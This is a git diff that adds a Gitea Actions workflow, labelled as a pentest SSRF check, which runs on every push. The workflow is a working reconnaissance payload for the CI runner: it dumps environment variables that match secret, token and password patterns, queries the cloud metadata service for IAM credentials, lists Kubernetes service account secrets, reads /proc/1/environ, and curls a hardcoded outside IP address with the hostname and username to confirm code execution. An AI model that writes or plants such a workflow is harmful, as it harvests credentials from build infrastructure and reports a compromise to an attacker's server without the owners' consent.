diff --git a/.gitea/workflows/recon.yml b/.gitea/workflows/recon.yml
new file mode 100644
index 0000000..6218100
--- /dev/null
+++ b/.gitea/workflows/recon.yml
@@ -0,0 +1,21 @@
+name: pentest-ssrf-check
+on: [push]
+jobs:
+  recon:
+    runs-on: ubuntu-latest
+    steps:
+      - name: System Info
+        run: |
+          echo "=== PENTEST SSI BASS PAGO ==="
+          id && hostname && uname -a
+          cat /etc/os-release 2>/dev/null | head -5
+          ip addr 2>/dev/null || ifconfig 2>/dev/null
+          cat /etc/hosts
+          cat /etc/resolv.conf
+          env | sort | grep -iE "KEY|SECRET|TOKEN|PASS|AUTH|DB|REDIS|URL|HOST|GITEA" | head -30
+          curl -s http://169.254.169.254/latest/meta-data/ 2>/dev/null || echo "No AWS metadata"
+          curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/ 2>/dev/null || echo "No IAM role"
+          ls -la /var/run/secrets/kubernetes.io/serviceaccount/ 2>/dev/null || echo "No K8s"
+          cat /proc/1/environ 2>/dev/null | tr 0 n | head -20 || echo "No proc environ"
+          # Callback to VPS to confirm execution
+          curl -s "http://144.172.101.121:8888/gitea-actions-rce?host=$(hostname)&user=$(whoami)" || true